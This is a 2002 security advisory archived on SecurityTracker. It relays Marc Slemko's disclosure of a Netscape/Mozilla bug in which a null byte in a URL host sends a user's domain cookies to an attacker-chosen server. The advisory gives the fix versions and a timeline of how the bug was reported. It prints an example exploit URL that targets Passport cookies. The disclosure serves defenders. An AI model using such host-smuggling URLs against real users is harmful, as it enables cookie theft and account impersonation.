SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Web Browser)  >   Netscape Vendors:   America Online, Inc.
Netscape Web Browser Cookie Processing Bug May Let Remote Web Sites Steal a User's Cookies for Any Domain
SecurityTracker Alert ID:  1003324
SecurityTracker URL:  http://securitytracker.com/id/1003324
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 22 2002
Impact:   Disclosure of authentication information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 6.1
Description:   An information disclosure vulnerability was reported in the Netscape web browser. A remote web site may be able to access a user's domain-based cookies for a different domain.

It is reported that a remote user can access another user's cookies for any domain if the other user loads a malicious URL.

If the target user (the victim) loads the following type of URL, the user's browser will connect to 'HostOne' and the cookies for the 'HostTwo' domain will be supplied to 'HostOne'.

http://[HostOne]%00[HostTwo]/cgi-bin/cookies

It is reported that site-specific (hostname) cookies cannot be obtained, but domain cookies can be obtained. For example, cookies for www.netscape.com cannot be obtained while cookies for .netscape.com can be obtained.

A demonstration exploit is available at:

http://alive.znep.com/~marcs/security/mozillacookie/demo.html

Impact:   A remote user can access another user's cookies for any domain.
Solution:   The vendor has released a fixed version (6.2.1), available at:

http://home.netscape.com/download/index.html?cp=dju1

Vendor URL:  home.netscape.com/security/ (Links to External Site)
Cause:   Access control error
Underlying OS:   Linux (Any), MacOS, UNIX (Any), Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(HP Issues Fix) Netscape Web Browser Cookie Processing Bug May Let Remote Web Sites Steal a User's Cookies for Any Domain   (support_feedback@us-support.external.hp.com (IT Resource Center ))
The vendor has released a fix.



 Source Message Contents

Date:  Mon, 21 Jan 2002 21:10:37 -0800 (PST)
Subject:  Mozilla Cookie Exploit


A while ago I discovered a bug in Mozilla that lets you steal cookies for
any domain by convincing the browser to load a specially formatted URL; I
have been too busy to get around to making the details known earlier, so
here they are.  This is similar to holes that have been found, both by
myself and by others, previous in IE.  Details available at
http://alive.znep.com/~marcs/security/mozillacookie/ and are also included
below.  Update to Netscape 6.2.1 or Mozilla 0.9.7 for a fix.  Using open
source products doesn't magically make you invulnerable to security
problems like those that plague Microsoft.


                           Mozilla Cookie Exploit
                        Marc Slemko <marcs@znep.com>
                Last Modified: $Date: 2002/01/22 05:06:04 $
                              $Revision: 1.6 $
                                      
Table of Contents

   [1]Executive Summary
   [2]What's New
   [3]Background
   [4]Details
   [5]Example Exploit
   
Executive Summary

   Cookies are often used to identify and authenticate users to a
   website. If an attacker can steal a user's cookies, then they can
   impersonate that user. The completeness of the impersonation and the
   actions the attacker can perform as that user depend on how the
   particular site uses the cookies.
   
   This bug in Mozilla allows an attacker to, if he can convince the
   user's browser to load a given URL, steal their cookies for any given
   domain. It does not require that active scripting is enabled in the
   browser, and can be done with something as simple as an image tag,
   allowing for hassle free use in HTML email, web based email services,
   etc.
   
   As expected, this bug is also present in Netscape 6.1. Upgrade to
   Netscape 6.2.1 or Mozilla 0.9.7 or higher, which fix this bug.
   
   The take-away message is that, due to implementation bugs in browser
   and in web applications, cookies can be stolen. It is critical that
   any application that depends on cookies does so with an understanding
   of this fact, and takes appropriate measures to limit the damage that
   can be done using stolen cookies.
   
What's New

     * Current Status Summary: (last updated Mon Jan 21 20:48:17 PST
       2002) I finally got around to making this vulnerability public.
     * mid-Jan 2002: Netscape put up a [6]note on their site saying that
       there was a security hole that they fixed.
     * Sometime between when I reported this bug to Netscape and when I
       made it public: This bug was fixed with the release of Netscape
       6.2.1 and Mozilla 0.9.7.
     * November 15, 2001: I reported this bug to Netscape via their
       security bug submission form. I had trouble finding a documented
       method for submitting security bugs to mozilla.org, but eventually
       figured out that security@mozilla.org existed. In any case, both
       submissions found their way to the same contact at Netscape.
       
Background

   Cookies are the mechanism used by most websites to identify and
   authenticate a user. If you can steal someone's cookies, you can trick
   the server into thinking you are them. Exactly what this gains you
   depends on the application and how it is designed. It may gain you
   very little, or it may gain you a whole lot (eg. [7]Microsoft Passport
   to Trouble). For more information about cookies, see [8]The Unofficial
   Cookie FAQ.
   
   Cookies are set with a specific hostname or a domain, so that they are
   only sent to that host or domain, with an exception or two that I
   won't go into here. They can also be set with a specific path, or with
   the secure flag, which means they will only be sent if the connection
   is a SSL connection. Normally, this should mean that only the server
   that set the cookie, or others it is operating in cooperation with
   (eg. in the same domain) can read it.
   
   Mozilla has a bug that lets you bypass this protection and steal
   cookies for any domain. This is quite similar to bugs found in
   Microsoft Internet Explorer in the past, such as [9]this one and
   [10]this one. As has been shown time and time again, there are many
   security flaws in many Microsoft products. Sadly, they are far from
   being alone. There is almost certainly no web browser out there that
   is functional enough to browse a significant percent of current
   popular websites and that does not have similar security holes.
   
Details

   The details are very trivial. Loading a URL such as:
        http://alive.znep.com%00www.passport.com/cgi-bin/cookies

   ...will cause Mozilla to connect to the hostname specified before the
   "%00", but send the cookies to the server based on the entire
   hostname. The "%00" is the URL encoded version of the null character,
   used in C to terminate strings.
   
   This exploit can be used to steal cookies with a specific path set,
   and can be used to steal cookies with the secure flag set, by using
   the specific path and SSL in the request URL. Note, however, that
   cookies set for a specific hostname (eg. "www.passport.com") can not
   be stolen using this method, but only cookies set for an entire domain
   (eg. ".passport.com").
   
   This bug was first tested on Netscape 6.1 on Windows 2000 and Mozilla
   0.9.5 build 2001111503 and 0.9.5 build 20011012 on Linux. It is
   expected that all Netscape 6.x and Mozilla versions prior to the
   recently released fixed versions are vulnerable.
   
Example Exploit

   An example exploit [11]is available. Very straightforward.
     _________________________________________________________________
   
   $Id: index.html,v 1.6 2002/01/22 05:06:04 marcs Exp marcs $
     _________________________________________________________________

References

   1. http://alive.znep.com/~marcs/security/mozillacookie/#executivesummary
   2. http://alive.znep.com/~marcs/security/mozillacookie/#history
   3. http://alive.znep.com/~marcs/security/mozillacookie/#background
   4. http://alive.znep.com/~marcs/security/mozillacookie/#details
   5. http://alive.znep.com/~marcs/security/mozillacookie/#example
   6. http://home.netscape.com/security/
   7. http://alive.znep.com/~marcs/passport/
   8. http://www.cookiecentral.com/faq/
   9. http://alive.znep.com/~marcs/security/iecookie1/
  10. http://alive.znep.com/~marcs/security/iecookie2/
  11. http://alive.znep.com/~marcs/security/mozillacookie/demo.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC